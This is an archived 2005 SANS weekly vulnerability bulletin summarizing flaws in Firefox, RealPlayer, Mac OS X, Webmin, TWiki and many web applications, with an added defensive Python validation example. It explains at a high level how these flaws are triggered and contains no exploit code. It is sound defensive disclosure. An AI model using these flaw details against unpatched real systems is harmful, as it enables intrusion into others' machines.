RISK: The Consensus Security Vulnerability Alert Vol. 4 No. 39

From: The SANS Institute (ConsensusSecurityVulnerabilityAlert@sans.org)
Date: Thu Sep 29 2005 - 19:38:11 CDT


Our survey on the value of RISK had a surprisingly huge response.
Thanks to all of you. The surprising finding was that you valued RISK
most for its notification of critical vulnerabilities in less widely
known tools. You already knew about the Windows vulnerabilities. So
we'll try to highlight the less well known ones to save you time. This
week we found critical vulnerabilities in Firefox, Mozilla, Mac OS
(Apple), RealPlayer, and Twiki.
                                 Alan

*************************************************************************
           RISK: The Consensus Security Vulnerability Alert
September 29, 2005 Vol. 4. Week 39
*************************************************************************

RISK is the SANS community's consensus bulletin summarizing the most
important vulnerabilities and exploits identified during the past week
and providing guidance on appropriate actions to protect your systems
(PART I). It also includes a comprehensive list of all new
vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week
=========================================================================
Platform                    # of Updates & Vulnerabilities
=========================================================================
Other Microsoft Products     1
Third Party Windows Apps     4
Mac OS                       1 (#3)
Linux                        3
Unix                         1 (#2)
Cross Platform              16 (#1)
Web Application             28 (#4, #5)
______________________________________________________________________

Table of Contents:

Part I -- Critical Vulnerabilities from TippingPoint, a division of 3Com

Widely Deployed Software
(1) HIGH: Mozilla, Firefox, Netscape Browsers Multiple Vulnerabilities
(2) HIGH: RealPlayer and Helix Player Format String Vulnerability
(3) HIGH: Apple Mac OS X Security Update 2005-008
(4) MODERATE: Webmin and Usermin Remote Authentication Bypass

Other Software
(5) HIGH: TWiki INCLUDE Function Remote Command Execution

************** SPONSORED BY SANS Network Security 2005 ******************

Los Angeles, CA October 24-30. Sixteen immersion training tracks and
many special short courses on the hottest technologies (wireless) and
techniques used by attackers. Special programs for auditors and security
managers along with a huge offering for security professionals. Plus a
big exposition and many evening sessions. A great conference.

Information: http://www.sans.org/ns2005/

Why people who care about security attend SANS training:
"This training is like nothing else. No vendor-bias, no marketing
spiel, just detailed theory and practice that will make a real,
immediate difference to my job." Jon King, VANCO

*************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys

 -- Other Microsoft Products
05.39.1 - Internet Explorer for Mac OS Denial of Service
 -- Third Party Windows Apps
05.39.2 - FL Studio FLP File Processing Heap Overflow
05.39.3 - SecureW2 Insecure Pre-Master Secret Generation Vulnerability
05.39.4 - 7-Zip ARJ File Buffer Overflow
05.39.5 - PowerArchiver Long Filename Buffer Overflow
 -- Mac OS
05.39.6 - Apple Mac OS X Security Update 2005-008 Multiple Vulnerabilities
 -- Linux
05.39.7 - RealNetworks RealPlayer and Helix Player Format String Vulnerability
05.39.8 - Astaro Security Linux PPTP Server Unspecified Remote Denial of Service
05.39.9 - Zengaia Unspecified SQL Injection
 -- Unix
05.39.10 - RSyslog Syslog Message SQL Injection
 -- Cross Platform
05.39.11 - TWikiUsers INCLUDE Function Allows Shell Execution
05.39.12 - Polipo Off-By-One Buffer Overflow
05.39.13 - MultiTheftAuto Multiple Remote Vulnerabilities
05.39.14 - wzdftpd SITE Command Arbitrary Command Execution
05.39.15 - phpMyFAQ Logs Unauthorized Access
05.39.16 - JPortal Download.PHP SQL Injection
05.39.17 - Mozilla Browser/Firefox DOM Objects Spoofing Vulnerability
05.39.18 - Mozilla Browser/Firefox XMLHttp Header Spoofing
05.39.19 - Multiple Browser Proxy Auto-Config Script Handling Remote Denial of Service
05.39.20 - Mozilla Browser/Firefox XBM Image Processing Heap Overflow
05.39.21 - Mozilla Browser/Firefox Unspecified JavaScript Engine Integer Overflow
05.39.22 - Mozilla Browser/Firefox Zero-Width Non-Joiner Stack Corruption
05.39.23 - Mozilla Browser/Firefox Chrome Window Spoofing
05.39.24 - Mozilla Browser/Firefox Chrome Page Loading Restriction Bypass
05.39.25 - Land Down Under Multiple SQL Injection Vulnerabilities
05.39.26 - Yukihiro Matsumoto Ruby SAFE Level Restriction Bypass
 -- Web Application
05.39.27 - CJ Web2Mail Multiple Cross-Site Scripting Vulnerabilities
05.39.28 - PostNuke PN_BBCode Local File Include
05.39.29 - CubeCart Multiple Cross-Site Scripting Vulnerabilities
05.39.30 - PHP-Fusion Messages.PHP SQL Injection
05.39.31 - Riverdark RSS Syndicator Module RSS.PHP Multiple Cross-Site Scripting Vulnerabilities
05.39.32 - contentServ Local File Include
05.39.33 - UNU Networks MailGust User_email.PHP SQL Injection
05.39.34 - CMS Made Simple Index.PHP Cross-Site Scripting
05.39.35 - SEO-Board Admin.PHP SQL Injection
05.39.36 - LucidCMS Index.PHP Cross-Site Scripting
05.39.37 - CJ LinkOut Top.PHP Cross-Site Scripting
05.39.38 - CJ Tag Board Multiple Cross-Site Scripting Vulnerabilities
05.39.39 - phpMyFAQ Local File Include Vulnerability
05.39.40 - AlstraSoft E-Friends Remote File Include
05.39.41 - phpMyFAQ Password.PHP SQL Injection
05.39.42 - phpMyFAQ Multiple Cross-Site Scripting Vulnerabilities
05.39.43 - Movable Type Username Information Disclosure
05.39.44 - Mall23 AddItem.ASP SQL Injection
05.39.45 - Lotus Domino Unspecified Cross-Site Scripting
05.39.46 - PunBB Forgotten Email Cross-Site Scripting
05.39.47 - PunBB Language Selection File Include
05.39.48 - GeSHI Example.PHP Directory Traversal
05.39.49 - Copernicus Europa Multiple Unspecified SQL Injection Vulnerabilities
05.39.50 - PerlDiver Perldiver.CGI Cross-Site Scripting
05.39.51 - Simplog Multiple SQL Injection Vulnerabilities
05.39.52 - My Little Forum Search.PHP SQL Injection
05.39.53 - Movable Type Remote File Include
05.39.54 - Movable Type Multiple Unspecified HTML Injection Vulnerabilities

______________________________________________________________________

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar at TippingPoint, a division of
3Com, as a by-product of that company's continuous effort to ensure that
its intrusion prevention products effectively block exploits using known
vulnerabilities. TippingPoint's analysis is complemented by input from
a council of security managers from twelve large organizations who
confidentially share with SANS the specific actions they have taken to
protect their systems. A detailed description of the process may be
found at http://www.sans.org/newsletters/cva/#process
Archives at http://www.sans.org/newsletters/risk

***********************
Widely Deployed Software
***********************

(1) HIGH: Mozilla, Firefox, Netscape Browsers Multiple Vulnerabilities
Affected:
Firefox versions 1.0.6 and prior
Mozilla versions 1.7.11 and prior
Netscape version 8.x

Description: Mozilla, Firefox and Netscape browsers contain the
following vulnerabilities that can be exploited by a malicious webpage
to compromise a user's system. (a) The function that processes XBM
(X-Bitmap) images contains a heap-based overflow that can be triggered
by an XBM image ending with a "space" character rather than the end tag.
According to the discoverer, the flaw can be exploited to execute
arbitrary code. (b) Unicode processing of certain sequences leads to a
stack-based overflow that can be exploited to execute arbitrary code.
(c) The JavaScript Engine contains an integer overflow that can be
exploited to execute arbitrary code. (d) The unprivileged "about:" page
can load a privileged "chrome:" page under certain conditions. This flaw
combined with another cross-zone flaw could result in the execution of
arbitrary code. The Mozilla bugzilla contains technical details required
to leverage these flaws.

Status: Mozilla Foundation has released version 1.0.7 for Firefox and
1.7.12 for Mozilla browsers. In addition to the above mentioned high
severity bugs, the newer versions also fix certain spoofing bugs. No
updates are available for Netscape.

Council Site Actions: Most of the council sites responded that they do
not officially support these browsers; however, the browsers are in use
at their sites. Most of these sites feel their users are clueful enough
to keep up to date with the patches, or they have notified the known
users. One of the reporting council sites updated most of its systems
earlier this week and will rely on users to update the remaining
systems. Another council site has posted the updated versions on its
software mirror.

References:
Mozilla Advisory
http://www.mozilla.org/security/announce/mfsa2005-58.html
SecurityFocus BIDs
http://www.securityfocus.com/bid/14916
http://www.securityfocus.com/bid/14917
http://www.securityfocus.com/bid/14918
http://www.securityfocus.com/bid/14920
http://www.securityfocus.com/bid/14919
http://www.securityfocus.com/bid/14923
http://www.securityfocus.com/bid/14921

****************************************************************

(2) HIGH: RealPlayer and Helix Player Format String Vulnerability
Affected:
Potentially all versions of RealPlayer and Helix Player on UNIX

Description: A zero-day vulnerability has been reported in RealPlayer
and Helix Player, the popular media players on UNIX systems. The players
reportedly contain a format string vulnerability in processing RealText
(".rt") and RealPix (".rp") files. The flaw is triggered by providing a
format string to the "image handle" parameter in a ".rp" file. A
malicious RealPix or RealText file in a webpage or an email can exploit
this issue to execute arbitrary code on the client system. If RealPlayer
or Helix Player is configured as the default media player, no user
interaction is required to leverage the flaw. The discoverer has posted
an exploit that works on Debian Linux.

Status: No patches are available from the vendor at this time. Users
should be advised not to automatically open realpix or realtext files.

Council Site Actions: Most of the council sites do not officially
support this software for their user base; thus, no action was taken.
Several sites will advise their users to patch their systems when a patch
is available. One site has a large user base of these products and plans
to monitor the product site for any upcoming patches; if an exploit is
released, it plans to notify its users not to automatically invoke these
programs from a browser or mail agent. Another site commented that the
use of these products is discouraged there, and it plans to notify users
when a patch is available.

References:
Posting by c0ntex
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0675.html
RealPix File Format
http://wdvl.com/Authoring/Languages/XML/SMIL/RealPix/rp.html
RealText File Format
http://service.real.com/help/library/guides/realtext/realtext.htm
SecurityFocus BID
http://www.securityfocus.com/bid/14945

****************************************************************

(3) HIGH: Apple Mac OS X Security Update 2005-008
Affected:
Mac OS X version 10.4.2 Server and Client

Description: Apple has released a security update for Mac OS X client
and server products that fixes buffer overflow, information disclosure,
cross-site scripting and local privilege escalation vulnerabilities. The
important issues fixed by this update are (a) the buffer overflow
vulnerabilities in components that handle GIF and PICT images. The
vulnerable components are also used by Safari. Hence, a malicious
webpage or email may exploit these flaws to compromise a Mac OS X
system. (b) QuickTime Java extensions contain a vulnerability that can
be exploited by a malicious applet to issue arbitrary function calls
from the system libraries. This can lead to a complete compromise of the
client system. The technical details about the flaws have not been
posted yet.

Status: Apply the security patch 2005-008.

Council Site Actions: Only two of the reporting council sites are
responding to this item. One site has scheduled the update push to their
Mac users. The other site said their Mac OS X systems are regularly
patched through the Software Update facility. The remaining sites are
not affected by this problem as they don't have any Mac systems or they
don't officially support them.

References:
Apple Security Advisory
http://docs.info.apple.com/article.html?artnum=302413
SecurityFocus BID
http://www.securityfocus.com/bid/14914

****************************************************************

(4) MODERATE: Webmin and Usermin Remote Authentication Bypass
Affected:
Webmin versions prior to 1.230
Usermin versions prior to 1.160

Description: Webmin provides a web interface for performing
administrative tasks, such as configuring users and servers, on
UNIX-based systems. Usermin is similar to Webmin and lets ordinary users
set up their own environment. Both Webmin and Usermin run the
"miniserv.pl" script, which contains a user-id spoofing vulnerability.
The problem arises because the script does not check for metacharacters
such as carriage return in user-supplied input during PAM (Pluggable
Authentication Modules) authentication. An unauthenticated attacker can
exploit this flaw to execute arbitrary commands on the Webmin/Usermin
server with "root" privileges. Successful exploitation, however, requires
that the "Full PAM conversations" option be enabled on the
"Authentication" page (not a default setting, and according to the
Webmin advisory the setting is rarely used). Note that Webmin/Usermin are
widely used and have been ported to most UNIX flavors.

Status: Fixes available. Upgrade to Webmin version 1.230 and Usermin
version 1.160.

Council Site Actions: Only two of the reporting sites are running the
affected software. Both sites are using the auto-update feature from
the Linux vendors and plan to allow updates to occur via that feature.

References:
SNS Advisory
http://archives.neohapsis.com/archives/bugtraq/2005-09/0257.html
Webmin Advisory
http://www.webmin.com/security.html
Webmin/Usermin Introduction
http://www.webmin.com/intro.html
http://www.webmin.com/uintro.html
SecurityFocus BID
http://www.securityfocus.com/bid/14889

****************************************************************

**************
Other Software
**************

(5) HIGH: TWiki INCLUDE Function Remote Command Execution
Affected:
TWikiRelease03Sep2004
TWikiRelease02Sep2004
TWikiRelease01Sep2004
TWikiRelease01Feb2003

Description: TWiki, a popular intranet content management tool, is
reported to contain another remote command execution vulnerability this
week. The problem occurs because the "INCLUDE" function does not check
for shell metacharacters in the "rev" parameter. An attacker may exploit
this flaw to execute arbitrary commands on the TWiki server. The
advisory shows how to craft a malicious HTTP request.

Status: Vendor confirmed, patches available. Note that TWikiRelease
01September2004 patched with Florian Weimer's patch
(http://www.enyo.de/fw/security/notes/twiki-robustness.html) is not
vulnerable.

References:
TWiki Advisory
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithInclude
SecurityFocus BID
http://www.securityfocus.com/bid/14960
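Items (4) and (5) share one root cause: user-supplied text reaching a shell command or a line-oriented PAM conversation without an allow-list check. The Python below is an added illustration of the hardened form, not Webmin's or TWiki's code; it assumes the INCLUDE handler resolves "rev" by running an RCS checkout ("co", an assumption for illustration), and the login-field check rejects carriage returns before they could reach PAM.

```python
import re
import subprocess

# Allow-list for an RCS-style revision such as "12" or "1.12".
# [0-9] rather than \d: in Python 3, \d also matches non-ASCII digits.
_REV_RE = re.compile(r"[0-9]+(?:\.[0-9]+)?")


def validate_rev(rev):
    """Return rev unchanged if it is a plain RCS revision, else None.

    fullmatch() anchors both ends of the string; a '$' anchor alone would
    still accept a trailing newline, which is exactly the kind of
    character an INCLUDE "rev" parameter must never carry into a command.
    """
    if not isinstance(rev, str):
        return None
    return rev if _REV_RE.fullmatch(rev) else None


def rcs_checkout_argv(rcs_file, rev):
    """Build argv for checking out one revision with RCS 'co' (assumed).

    Returning a list for subprocess.run(..., shell=False) keeps the
    revision a single literal argument: no shell ever parses it, so a
    value that slipped past validate_rev() still could not chain commands.
    """
    r = validate_rev(rev)
    if r is None:
        raise ValueError(f"rejected revision parameter: {rev!r}")
    return ["co", "-q", f"-p{r}", rcs_file]


def checkout_revision(rcs_file, rev):
    """Run the checkout without a shell and return the revision text."""
    proc = subprocess.run(rcs_checkout_argv(rcs_file, rev),
                          capture_output=True, text=True, check=True)
    return proc.stdout


def has_control_chars(value):
    """True if value holds CR, LF, NUL or any other C0/DEL control char.

    This is the check item (4) says miniserv.pl lacked: a carriage return
    inside a login field must not reach a line-oriented PAM conversation.
    """
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def validate_login_fields(username, password):
    """Return (username, password) or raise before either reaches PAM."""
    for name, value in (("username", username), ("password", password)):
        if has_control_chars(value):
            raise ValueError(f"{name} contains control characters")
    return username, password


if __name__ == "__main__":
    # Constructed demonstration values, not taken from any advisory.
    print(rcs_checkout_argv("WebHome.txt,v", "1.12"))
    for bad in ("1.12\n", "1.12 ", "latest"):
        try:
            rcs_checkout_argv("WebHome.txt,v", bad)
        except ValueError as e:
            print("rejected:", e)
```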

*****************************************************************

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 39, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that
company's ongoing effort to ensure its vulnerability management web
service tests for all known vulnerabilities that can be scanned. As of
this week Qualys scans for 4545 unique vulnerabilities. For this special
SANS community listing, Qualys also includes vulnerabilities that cannot
be scanned remotely.

______________________________________________________________________

05.39.1 CVE: Not Available
Platform: Other Microsoft Products
Title: Internet Explorer for Mac OS Denial of Service
Description: Internet Explorer for Mac OS is vulnerable to a denial of
service issue due to kernel exception failure caused by invalid memory
access when opening a malformed Web page. Microsoft Internet Explorer
version 5.2.3 for Mac OS is vulnerable.
Ref: http://www.securityfocus.com/bid/14899
______________________________________________________________________

05.39.2 CVE: Not Available
Platform: Third Party Windows Apps
Title: FL Studio FLP File Processing Heap Overflow
Description: Image-Line Software FL Studio is a commercial audio
editing package. It is vulnerable to a remote heap overflow issue due
to a failure of the application to properly bounds check user-supplied
data prior to copying it to an insufficiently sized memory buffer. An
attacker could exploit this issue to execute arbitrary machine code in
the context of the user running the affected application. FL Studio
version 5.0.1 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/411737
______________________________________________________________________

05.39.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: SecureW2 Insecure Pre-Master Secret Generation Vulnerability
Description: SecureW2 is an EAP-TTLS (Extensible Authentication
Protocol Tunneled Transport Layer Security) client for Microsoft
Windows. It is reported to be vulnerable to an insecure pre-master
secret generation issue. SecureW2 versions 3.1.1 and earlier are
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14947
______________________________________________________________________

05.39.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: 7-Zip ARJ File Buffer Overflow
Description: 7-Zip is a file compression and decompression application
for Microsoft Windows. It is prone to a stack-based buffer overflow
vulnerability when handling ARJ blocks that are greater than 2600
bytes. The vulnerability has been confirmed in versions 3.13, 4.23,
and 4.26 BETA. Other versions may also be affected.
Ref: http://www.securityfocus.com/archive/1/411522
______________________________________________________________________

05.39.5 CVE: Not Available
Platform: Third Party Windows Apps
Title: PowerArchiver Long Filename Buffer Overflow
Description: PowerArchiver is a file compression and decompression
tool. It is reported to be vulnerable to a long filename buffer
overflow issue. PowerArchiver 2006 versions 9.5 Beta 5 and earlier are
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14922
______________________________________________________________________

05.39.6 CVE: CAN-2005-1992, CAN-2005-2747, CAN-2005-2746,
CAN-2005-2745, CAN-2005-2748, CAN-2005-2744, CAN-2005-2743,
CAN-2005-2524, CAN-2005-2742, CAN-2005-2741
Platform: Mac OS
Title: Apple Mac OS X Security Update 2005-008 Multiple
Vulnerabilities
Description: Apple has released Security Update 2005-008 to address
multiple arbitrary code execution, information disclosure, local
privilege escalation, cross-site scripting and unauthorized access
issues. Mac OS X versions 10.4.2 and earlier are reported to be
vulnerable.
Ref: http://www.securityfocus.com/bid/14914
______________________________________________________________________

05.39.7 CVE: Not Available
Platform: Linux
Title: RealNetworks RealPlayer and Helix Player Format String
Vulnerability
Description: RealPlayer and Helix player are susceptible to a format
string vulnerability. This issue is due to a failure of the
application to properly sanitize user-supplied input, allowing a
remote attacker to supply format specifiers directly to a formatted
printing function. RealNetworks RealPlayer version 10.0.5.756 Gold on
Linux is affected.
Ref: http://www.securityfocus.com/bid/14945
______________________________________________________________________

05.39.8 CVE: Not Available
Platform: Linux
Title: Astaro Security Linux PPTP Server Unspecified Remote Denial of
Service
Description: Astaro Security Linux is a network security solution
offering firewall, VPN, intrusion detection and antivirus
capabilities. The Astaro Security Linux Point-to-Point Tunneling
Protocol (PPTP) server is affected by an unspecified remote denial of
service vulnerability. A remote attacker may exploit this issue by
sending specially crafted data to the PPTP server, causing the
application to crash. Version 4.0.27 is vulnerable.
Ref: http://www.securityfocus.com/bid/14950/info
______________________________________________________________________

05.39.9 CVE: Not Available
Platform: Linux
Title: Zengaia Unspecified SQL Injection
Description: Zengaia is a multiplayer game. Zengaia is reportedly
affected by an unspecified SQL injection vulnerability. This is due to
the application failing to properly sanitize user-supplied input
before using it in an SQL query. Zengaia versions prior to 0.2, as well
as versions 0.2 and 0.2.1, are reported to be affected.
Ref: http://www.securityfocus.com/bid/14892
______________________________________________________________________

05.39.10 CVE: CAN-2005-3074
Platform: Unix
Title: RSyslog Syslog Message SQL Injection
Description: RSyslog is a system log management daemon. It is prone to
an SQL injection vulnerability. This vulnerability could permit remote
attackers to pass malicious input to database queries, resulting in
modification of query logic or other attacks. All versions prior to
1.10.1 are vulnerable.
Ref: http://www.rsyslog.com/Article37.phtml
______________________________________________________________________

05.39.11 CVE: CAN-2005-2877
Platform: Cross Platform
Title: TWikiUsers INCLUDE Function Allows Shell Execution
Description: TWiki is a Web-based application that allows creation and
maintenance of Web sites. It is vulnerable to a remote shell execution
due to insufficient sanitization of user-supplied data passed through
the "rev" parameter. TWiki versions 03Sep2004 and earlier are reported
to be vulnerable.
Ref: http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithInclude
______________________________________________________________________

05.39.12 CVE: Not Available
Platform: Cross Platform
Title: Polipo Off-By-One Buffer Overflow
Description: Polipo is a small and fast caching web proxy. It is prone
to an off-by-one buffer overflow vulnerability due to a problem in the
application when parsing NL-terminated headers. Polipo versions 0.9.8
and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/14961
______________________________________________________________________

05.39.13 CVE: Not Available
Platform: Cross Platform
Title: MultiTheftAuto Multiple Remote Vulnerabilities
Description: MultiTheftAuto is a mod and server for Grand Theft Auto
III and Grand Theft Auto: Vice City. It is reported to be vulnerable
to multiple vulnerabilities. MultiTheftAuto versions 0.5 patch 1 and
earlier versions are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14941
______________________________________________________________________

05.39.14 CVE: Not Available
Platform: Cross Platform
Title: wzdftpd SITE Command Arbitrary Command Execution
Description: wzdftpd is an FTP server implementation. It is affected
by a remote arbitrary command execution vulnerability due to
insufficient sanitization of user-supplied data. wzdftpd version 0.5.4
is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14935
______________________________________________________________________

05.39.15 CVE: Not Available
Platform: Cross Platform
Title: phpMyFAQ Logs Unauthorized Access
Description: phpMyFAQ is an FAQ manager web application. It is
vulnerable to unauthorized access because access to the log files is
granted without an authorization check. phpMyFAQ version 1.5.1 is
vulnerable.
Ref: http://www.securityfocus.com/bid/14930
______________________________________________________________________

05.39.16 CVE: CAN-2005-3052
Platform: Cross Platform
Title: JPortal Download.PHP SQL Injection
Description: JPortal is a web-based portal application. JPortal is
prone to an SQL injection vulnerability. Successful exploitation could
result in a compromise of the application, disclosure or modification
of data, or may permit an attacker to exploit vulnerabilities in the
underlying database implementation. Versions 2.2.1 through 2.3.1 are
vulnerable.
Ref: http://www.securityfocus.com/archive/1/411518
______________________________________________________________________

05.39.17 CVE: CAN-2005-2704
Platform: Cross Platform
Title: Mozilla Browser/Firefox DOM Objects Spoofing Vulnerability
Description: Mozilla and Firefox are prone to a DOM object spoofing
issue that is exposed through an XBL control that uses <implement> for
an internal interface. A remote attacker could potentially exploit
this issue to gain elevated privileges. Please refer to the link below
for a list of vulnerable versions.
Ref: http://www.securityfocus.com/bid/14921/info
______________________________________________________________________

05.39.18 CVE: CAN-2005-2703
Platform: Cross Platform
Title: Mozilla Browser/Firefox XMLHttp Header Spoofing
Description: Mozilla and Firefox browsers are vulnerable to XMLHttp
header spoofing due to insufficient sanitization of user-supplied input
to the headers of the XMLHttpRequest. Firefox versions 1.0.6 and Mozilla
Suite versions 1.7.11 and earlier are reported to be vulnerable.
Ref: http://www.mozilla.org/security/announce/mfsa2005-58.html
______________________________________________________________________

05.39.19 CVE: Not Available
Platform: Cross Platform
Title: Multiple Browser Proxy Auto-Config Script Handling Remote
Denial of Service
Description: Multiple browsers are affected by a remote denial of
service vulnerability due to a design error in the browser processing
a proxy auto-config (PAC) script containing an "eval()" statement.
Firefox versions 1.0.6 and earlier, Netscape Browser versions 8.0.3.3,
and Mozilla versions 1.7.11 and earlier are affected by this issue.
Ref: http://www.securityfocus.com/bid/14924
______________________________________________________________________

05.39.20 CVE: CAN-2005-0215
Platform: Cross Platform
Title: Mozilla Browser/Firefox XBM Image Processing Heap Overflow
Description: Mozilla and Firefox web browsers are vulnerable to a heap
overflow issue when processing malformed XBM images with a space
character as the terminator. Firefox versions 1.0.6 and Mozilla
versions 1.7.11 and earlier are vulnerable.
Ref: http://www.mozilla.org/security/announce/mfsa2005-58.html
______________________________________________________________________

05.39.21 CVE: CAN-2005-2705
Platform: Cross Platform
Title: Mozilla Browser/Firefox Unspecified JavaScript Engine Integer
Overflow
Description: Mozilla and Firefox are affected by an unspecified
integer overflow vulnerability in their JavaScript engine due to
insufficient boundary checking prior to copying user-supplied data
into sensitive process buffers. Netscape versions 7.2, Netscape
Browser versions 8.0.3.3, and Mozilla Firefox versions 1.0.6 and
earlier are affected.
Ref: http://www.securityfocus.com/bid/14917
______________________________________________________________________

05.39.22 CVE: CAN-2005-2702
Platform: Cross Platform
Title: Mozilla Browser/Firefox Zero-Width Non-Joiner Stack Corruption
Description: Mozilla and Firefox are prone to a stack corruption
vulnerability. This issue occurs when Unicode sequences are used with
zero-width non-joiner characters. Successful exploitation could result
in arbitrary code execution in the security context of the user
running the browser.
Ref: http://www.securityfocus.com/bid/14918/references
______________________________________________________________________

05.39.23 CVE: CAN-2005-2707
Platform: Cross Platform
Title: Mozilla Browser/Firefox Chrome Window Spoofing
Description: Mozilla and Firefox browsers are prone to a window
spoofing vulnerability. An error in the creation of windows can be
exploited by opening a window from a reference to a closed window to
create a blank "chrome" canvas. The resulting window is missing
certain security mechanisms designed to protect against phishing
attacks, such as the address bar and the status bar. Mozilla Firefox
versions 1.0.6 and earlier and Mozilla Browser versions 1.7.11 and
earlier are affected.
Ref: http://www.mozilla.org/security/announce/mfsa2005-58.html
______________________________________________________________________

05.39.24 CVE: CAN-2005-2706
Platform: Cross Platform
Title: Mozilla Browser/Firefox Chrome Page Loading Restriction Bypass
Description: Mozilla Browser/Firefox are prone to a potential
arbitrary code execution weakness. This issue allows an attacker to
bypass restrictions associated with loading privileged "chrome" pages.
Ref: http://www.securityfocus.com/bid/14920
______________________________________________________________________

05.39.25 CVE: CAN-2005-2788
Platform: Cross Platform
Title: Land Down Under Multiple SQL Injection Vulnerabilities
Description: Land Down Under is a content management system. It is
affected by multiple SQL injection vulnerabilities due to insufficient
sanitization of user supplied input before including it in SQL
queries. Land Down Under version 801 is vulnerable.
Ref: http://www.securityfocus.com/bid/14896/info
______________________________________________________________________

05.39.26 CVE: CAN-2005-2337
Platform: Cross Platform
Title: Yukihiro Matsumoto Ruby SAFE Level Restriction Bypass
Description: Ruby is an object-oriented scripting language. It is
susceptible to a SAFE level restriction bypass vulnerability due to a
flaw when executing with the SAFE level set to 1, the level at which
objects that are "tainted" are not allowed to be executed. Ruby versions
prior to 1.8.3 are vulnerable.
Ref: http://www.securityfocus.com/bid/14909
______________________________________________________________________

05.39.27 CVE: CAN-2005-2901
Platform: Web Application
Title: CJ Web2Mail Multiple Cross-Site Scripting Vulnerabilities
Description: CJ Web2Mail is vulnerable to multiple cross-site
scripting issues due to a failure in the application to properly
sanitize user-supplied input to the thankyou.php and web2mail.php
scripts. An attacker may leverage this issue to steal cookie-based
authentication credentials as well as perform other attacks. CJ
Web2Mail 3.0 is vulnerable.
Ref: http://www.securityfocus.com/bid/14956/info
______________________________________________________________________

05.39.28 CVE: Not Available
Platform: Web Application
Title: PostNuke PN_BBCode Local File Include
Description: PostNuke is a content management system written in PHP.
It is reported to be vulnerable to a local file include issue due to
improper sanitization of user-supplied input to the GeSHi library
"pn_bbcode" module of the application. PostNuke version 0.760 is
reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14958
______________________________________________________________________

05.39.29 CVE: Not Available
Platform: Web Application
Title: CubeCart Multiple Cross-Site Scripting Vulnerabilities
Description: CubeCart is an eCommerce script written in PHP using a
MySQL database back end. It is prone to multiple cross-site scripting
vulnerabilities. An attacker may leverage any of these issues to have
arbitrary script code executed in the browser of an unsuspecting user
in the context of the affected site.
Ref: http://www.securityfocus.com/bid/14962
______________________________________________________________________

05.39.30 CVE: Not Available
Platform: Web Application
Title: PHP-Fusion Messages.PHP SQL Injection
Description: PHP-Fusion is affected by an SQL injection vulnerability.
Insufficient sanitization of the "msg_send" parameter of the
"messages.php" script exposes this issue. All current versions are
affected.
Ref: http://www.securityfocus.com/bid/14964
______________________________________________________________________

05.39.31 CVE: CAN-2005-3085
Platform: Web Application
Title: Riverdark RSS Syndicator Module RSS.PHP Multiple Cross-Site
Scripting Vulnerabilities
Description: Riverdark RSS Syndicator Module is a newsfeed aggregator
module for Invision Power Board. It is prone to multiple cross-site
scripting vulnerabilities due to insufficient sanitization of
user-supplied input to the "forum" and "topic" parameters of the
"rss.php" script. Riverdark RSS Syndicator module version 2.1.7 is
vulnerable.
Ref: http://securitytracker.com/id?1014969
______________________________________________________________________

05.39.32 CVE: Not Available
Platform: Web Application
Title: contentServ Local File Include
Description: contentServ is web-based content management software
implemented in PHP. It is prone to a local file include vulnerability
due to insufficient sanitization of user-supplied input to the
"ctsWebsite" parameter of the "admin/about.php" script. contentServ
version 3.1 is affected.
Ref: http://www.securityfocus.com/bid/14943
______________________________________________________________________

05.39.33 CVE: Not Available
Platform: Web Application
Title: UNU Networks MailGust User_email.PHP SQL Injection
Description: MailGust is a web-based application that acts as a
mailing list manager, a newsletter distribution tool, and a message
board. It is prone to an SQL injection vulnerability due to improper
sanitization of user-supplied input to the "email" field of the
"/gorum/user_email.php" script. MailGust version 1.9 is reported to be
vulnerable.
Ref: http://www.securityfocus.com/archive/1/411586
______________________________________________________________________

05.39.34 CVE: Not Available
Platform: Web Application
Title: CMS Made Simple Index.PHP Cross-Site Scripting
Description: CMS Made Simple is a content management system written in
PHP. It is prone to a cross-site scripting vulnerability that is
caused by insufficient sanitization of user-supplied input to the
"page" parameter of the "index.php" script. This issue is reported to
affect CMS Made Simple version 0.10; other versions may also be
vulnerable.
Ref: http://www.securityfocus.com/bid/14937
______________________________________________________________________

05.39.35 CVE: Not Available
Platform: Web Application
Title: SEO-Board Admin.PHP SQL Injection
Description: SEO-Board is a forum application. It is vulnerable to an
SQL injection issue due to a failure in the application to properly
sanitize user-supplied cookie data that is processed by the
"admin.php" script. Successful exploitation could result in a
compromise of the application, disclosure or modification of data.
SEO-Board versions earlier than 1.03 are vulnerable.
Ref: http://www.securityfocus.com/bid/14936/info
______________________________________________________________________

05.39.36 CVE: Not Available
Platform: Web Application
Title: LucidCMS Index.PHP Cross-Site Scripting
Description: LucidCMS is a simple and flexible content management
system. It is prone to a cross-site scripting vulnerability due to
insufficient sanitization of user-supplied input to the "index.php"
script. LucidCMS 1.0.11 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14951
______________________________________________________________________

05.39.37 CVE: CAN-2005-2900
Platform: Web Application
Title: CJ LinkOut Top.PHP Cross-Site Scripting
Description: CJ LinkOut is a URL redirection script written in PHP. CJ
LinkOut is prone to a cross-site scripting vulnerability caused by
improper sanitization of user-supplied input to the "123" parameter of
the "top.php" script. CJ LinkOut version 1.0 is affected.
Ref: http://www.securityfocus.com/bid/14953
______________________________________________________________________

05.39.38 CVE: CAN-2005-2899
Platform: Web Application
Title: CJ Tag Board Multiple Cross-Site Scripting Vulnerabilities
Description: CJ Tag Board is prone to multiple cross-site scripting
vulnerabilities. Insufficient sanitization of the date, time, name,
ip, agent and msg parameters exposes the issue. All current versions
are affected.
